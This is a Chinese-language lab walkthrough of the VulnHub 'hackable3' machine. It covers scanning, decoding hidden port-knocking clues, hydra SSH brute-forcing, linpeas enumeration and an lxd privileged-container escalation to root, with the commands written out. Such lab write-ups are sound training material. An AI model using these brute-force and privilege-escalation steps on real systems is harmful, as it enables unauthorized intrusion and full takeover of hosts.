vulnhub之hackable3的实践

admin
admin
admin
102772
文章
87
评论
2022年5月30日01:25:14评论51 views字数 2036阅读6分47秒阅读模式

今天实践的是vulnhub的hackable3镜像,

下载地址,https://download.vulnhub.com/hackable/hackable3.ova,

用workstation导入成功,但扫描不到地址,重新用virtualbox导入,

再次地址扫描,sudo netdiscover -r 192.168.1.0/24,

vulnhub之hackable3的实践

确认一下是192.168.1.110,

接着做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.1.110,

vulnhub之hackable3的实践

看到有http和ssh服务,但是ssh服务是被过滤的,

访问主页,并查看源码,看到三个信息,

一是登录页面的url,二是用户名jubiscleudo,三是需要端口敲门,

vulnhub之hackable3的实践

既然有端口敲门,就需要找到连续的几个端口,当前信息不够,继续找,

web目录爆破看看,sudo dirb http://192.168.1.110,

vulnhub之hackable3的实践

访问backup页面,发现里面有个wordlist.txt文件,

vulnhub之hackable3的实践

下载下来wget http://192.168.1.110/backup/wordlist.txt,

查看cat wordlist.txt,发现是个密码清单,留着后面做爆破用,

访问config页面,发现里面有个1.txt文件,

vulnhub之hackable3的实践

下载下来wget http://192.168.1.110/config/1.txt,

查看cat 1.txt,内容是MTAwMDA=,猜测是base64编码,

解码,echo MTAwMDA= | base64 -d,得到明文10000,

这就是端口敲门的第一个端口号,

访问css页面,发现里面有个2.txt文件,

vulnhub之hackable3的实践

下载下来wget http://192.168.1.110/css/2.txt,

查看cat 2.txt,

内容是++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>------------------....,猜测是brainfuck编码,

网上搜了个在线破解站点,https://ctf.bugku.com/tool/brainfuck,

破解得到明文4444,这就是端口敲门的第二个端口号,

访问登录页面,http://192.168.1.110/login_page/login.html,查看源码,

vulnhub之hackable3的实践

看到有个login.php的页面,登录并查看源码,发现里面有个3.jpg的url,

下载文件,wget http://192.168.1.110/3.jpg,猜测有steghide隐写,

kali攻击机上安装工具,sudo apt install steghide,

解码隐写信息,没有密码,sudo steghide extract -sf 3.jpg,

查看明文信息文件,cat steganopayload148505.txt,

内容是porta:65535,这就是端口敲门的第三个端口号,

三个用来敲门的端口这就凑齐了,10000 4444 65535,

kali攻击机上安装工具,sudo apt install knockd,

敲门,sudo knock 192.168.1.110 10000 4444 65535,

接着就可以对ssh服务爆破了,

sudo hydra -l jubiscleudo -P wordlist.txt 192.168.1.110 ssh,

得到用户名密码,jubiscleudo/onlymy,

vulnhub之hackable3的实践

ssh上去,ssh [email protected]

id看一下不是root,需要继续提权,

下载一个搜集信息的工具传到靶机,

https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh,

执行搜集信息工具,获取到新的用户名密码,hackable_3/TrOLLED_3,

vulnhub之hackable3的实践

切到hackable_3用户,id发现跟lxd有关系,猜测可通过lxd提权,

下载有提权漏洞的lxd镜像传到靶机,

https://github.com/saghul/lxd-alpine-builder/blob/master/alpine-v3.13-x86_64-20210218_0139.tar.gz,

在靶机上导入lxd镜像,并启动lxd容器实例,再进到容器的shell,

lxc image import ./alpine-v3.13-x86_64-20210218_0139.tar.gz --alias myimage,

lxd init,lxc init myimage ignite -c security.privileged=true,

lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true,

lxc start ignite,lxc exec ignite /bin/sh,id看一下是root,

vulnhub之hackable3的实践


原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之hackable3的实践

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年5月30日01:25:14
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   vulnhub之hackable3的实践https://cn-sec.com/archives/1064853.html

发表评论

匿名网友 填写信息